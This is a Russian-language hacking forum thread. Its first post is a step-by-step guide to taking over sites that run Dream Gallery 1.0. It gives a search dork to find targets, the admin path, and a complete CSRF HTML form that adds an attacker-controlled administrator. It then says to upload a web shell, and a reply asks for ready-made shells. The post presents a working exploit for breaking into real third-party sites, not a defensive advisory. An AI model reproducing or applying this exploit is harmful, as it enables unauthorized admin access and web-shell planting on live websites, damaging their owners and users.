Загрузка...

Dream Gallery баг

Тема в разделе Веб уязвимости создана пользователем MaN1aK_inactive40465 26 авг 2016. 2972 просмотра

Загрузка...
  1. MaN1aK_inactive40465
    MaN1aK_inactive40465 Автор темы 26 авг 2016 Заблокирован(а) 135 7 июн 2016
    В скрипте Dream Gallery 1.0 найдено уязвимость CSRF - Add Admin
    Т.е можно в админке создать нового админа
    Дорк: "Design by Rafael Clares"
    В найденных сайта ищем админку.
    site.ru/admin
    Как только найдем сайта с админкой можно приступить к взлому
    Открываем блокнот и пишем такой код
    Код
    <html>
    <bOdy>
    <form method="post" action="http://site.ru/admin/usuario.php?action=incluir">
    <input type="hidden" name="user_login" value="darkknight">
    <input type="hidden" name="user_password" type="hidden" value="parol" >
    <input type="hidden" name="user_email" value="">
    <input type="submit" value="hack">
    </form>
    </bOdy>
    </html>
    тут darkknight будет логин админа
    parol - пароль админа
    site.ru - тут меняем только домен у которого мы нашли админку
    сохраняем как html и запускаем в браузере
    После того как нажимаем кнопку hack мы попадаем в админку сайта
    там будет надпись Hey Dude!
    После этого можно спокойно зайти в раздел albums и загрузить туда шелл
     
  2. Лейлонер
    Лейлонер 26 авг 2016 Заблокирован(а) 540 30 май 2016
    Есть шелы готовые?
     
  3. RaysMorgan
Top